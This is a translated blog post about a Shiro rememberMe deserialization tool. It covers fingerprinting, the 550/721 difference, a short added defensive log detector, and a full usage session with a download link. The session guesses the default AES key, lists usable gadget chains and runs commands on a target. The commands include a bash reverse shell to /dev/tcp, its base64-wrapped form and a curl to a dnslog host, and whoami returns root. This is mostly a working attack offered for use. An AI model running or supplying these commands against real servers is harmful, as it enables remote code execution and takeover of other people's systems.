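0x01 Introduction
Apache Shiro is a security framework for Java. With Shiro it is easy to build sufficiently good applications, and it can be used in both JavaSE and JavaEE environments. Shiro helps with authentication, authorization, cryptography, session management, web integration, caching and more.
0x02 Fingerprinting & the difference between 550 and 721
Set the rememberMe field in the request's Cookie to an arbitrary value
The response contains Set-Cookie: rememberMe=deleteMe
The URL contains the string "shiro"
Sometimes the server will not return rememberMe=deleteMe on its own; in that case just send the request directly.
The main difference is that Shiro550 uses a known default key: as long as you have enough keys, no Remember cookie is needed.
In Shiro721 the AES encryption key is randomly generated by the system, so the rememberMe obtained after login is needed to brute-force the correct key value. A valid RememberMe cookie is used as the prefix for a Padding Oracle Attack, and the deserialization attack is then constructed.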
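Seen from the defending side, the fingerprint above is also a detection signal: key guessing (550) and a padding-oracle run (721) both produce many rememberMe cookies that the server rejects with rememberMe=deleteMe. The following Python detector is an added example, not part of the original article or of the tool; the JSON-lines log schema (src, cookie, set_cookie), the threshold and the sample records are assumptions constructed for illustration.

```python
import json
from collections import Counter

# Constructed sample: JSON-lines proxy records (assumed schema: src, cookie, set_cookie).
SAMPLE_LOG = """\
{"src": "203.0.113.7", "cookie": "rememberMe=1", "set_cookie": "rememberMe=deleteMe; Path=/; Max-Age=0"}
{"src": "203.0.113.7", "cookie": "rememberMe=QUFBQQ==", "set_cookie": "rememberMe=deleteMe; Path=/; Max-Age=0"}
{"src": "203.0.113.7", "cookie": "rememberMe=QkJCQg==", "set_cookie": "rememberMe=deleteMe; Path=/; Max-Age=0"}
{"src": "203.0.113.7", "cookie": "JSESSIONID=x; rememberMe=Q0NDQw==", "set_cookie": "rememberMe=deleteMe; Path=/; HttpOnly"}
{"src": "198.51.100.20", "cookie": "rememberMe=RERERA==", "set_cookie": "rememberMe=deleteMe; Path=/; Max-Age=0"}
{"src": "198.51.100.21", "cookie": "JSESSIONID=y", "set_cookie": ""}
{"src": "198.51.100.22", "cookie": "rememberMe=RUVFRQ==", "set_cookie": ""}
"""

def parse_cookie(header):
    """Return {name: value} for a Cookie or Set-Cookie header string."""
    # split("=", 1) keeps base64 padding ('==') inside the value;
    # attributes without '=' (HttpOnly, Secure) are skipped.
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return {name: value for name, value in pairs}

def rejected_remember_me(rec, cookie_name="rememberMe"):
    """True when the client sent the cookie and the server answered deleteMe."""
    sent = cookie_name in parse_cookie(rec.get("cookie", ""))
    reply = parse_cookie(rec.get("set_cookie", "")).get(cookie_name)
    return sent and reply == "deleteMe"

def suspicious_sources(log_text, threshold=3, cookie_name="rememberMe"):
    """Count rejected rememberMe cookies per source; return sources >= threshold.

    One rejection is normal (an expired or stale cookie); a burst from one
    source matches key guessing or a padding-oracle run.
    """
    hits = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rejected_remember_me(rec, cookie_name):
            hits[rec["src"]] += 1
    return {src: n for src, n in hits.items() if n >= threshold}

if __name__ == "__main__":
    print(suspicious_sources(SAMPLE_LOG))
```

Pass cookie_name when the application has renamed the cookie, and tune threshold to the volume of stale cookies normally seen on the site.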
0x02 Tool usage
> java -jar shiro_tool.jar
Usage: java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck --> skip check target is shiro or not.
skip --> all gadget default can be use
redirect --> follow redirect default:false
randomagent --> random useragent
notcheckall --> not check all gadget
useragent= --> set useragent
cookiename= --> default: rememberMe; use this when the cookie is not named rememberMe
x= --> print result
cmd= --> set command to run
dcmd= --> set command to run, command format base64 string
key= --> set a shiro key
req= --> request body file request body file (save the captured request to a file and give the file name here)
keys= --> keys file (a file of custom keys, one key per line)
java -cp shiro_tool.jar shiro.Check urls=<file with a batch of URLs> redirect
java -cp shiro_tool.jar shiro.Check http://www.shiro.com
> java -jar shiro_tool.jar https://xx.xx.xx.xx/
[ ] target: https://xx.xx.xx.xx/
[ ] target is use shiro
[ ] start guess shiro key.
[ ] shiro key: kPH+bIxk5D2deZiIxcaaaA==
[ ] check URLDNS
[ ] find: URLDNS can be use
[ ] check CommonsBeanutils1
[ ] find: CommonsBeanutils1 can be use
[ ] check CommonsBeanutils2
[ ] check CommonsCollections1
[ ] check CommonsCollections2
[ ] check CommonsCollections3
[ ] check CommonsCollections4
[ ] check CommonsCollections5
[ ] check CommonsCollections6
[ ] check CommonsCollections7
[ ] check CommonsCollections8
[ ] check CommonsCollections9
[ ] check CommonsCollections10
[ ] check CommonsCollectionsK1
[ ] check CommonsCollectionsK2
[ ] check CommonsCollectionsK3
[ ] check CommonsCollectionsK4
[ ] check Groovy1
[ ] find: Groovy1 can be use
[ ] check JSON1
[ ] find: JSON1 can be use
[ ] check Spring1
[ ] find: Spring1 can be use
[ ] check Spring2
[ ] check JRMPClient
[ ] find: JRMPClient can be use
[ ] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener
0: URLDNS
1: CommonsBeanutils1
2: Groovy1
3: JSON1
4: Spring1
5: JRMPClient
[ ] please enter the number(0-6)
3
[-] use gadget: JSON1
[*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[*] command example: curl dnslog.xx.com
[*] if need base64 command, input should startwith bash=/powershell=/python=/perl=
[ ] please enter command, input q or quit to quit
> curl json.dnslog.xx.cn
[ ] start process command: curl json.dnslog.xx.cn
[ ] please enter command, input q or quit to quit
> bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[ ] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
[ ] please enter command, input q or quit to quit
> output=on
[ ] print payload mode on.
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> whoami
kPH+bIxk5D2deZiIxcaaaA== - CommonsBeanutils1 - [base64 payload omitted]
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> x=whoami
root
[ ] please enter command, enter q or quit to quit, enter back to re-choose gadget
> quit
[ ] start process command: quit
[ ] quit
0x03 Download
Project URL:
https://www.aliyundrive.com/s/ALnnGVKfFT9
Originally published on the WeChat official account 琴音安全: shiro deserialization command-execution detection helper tool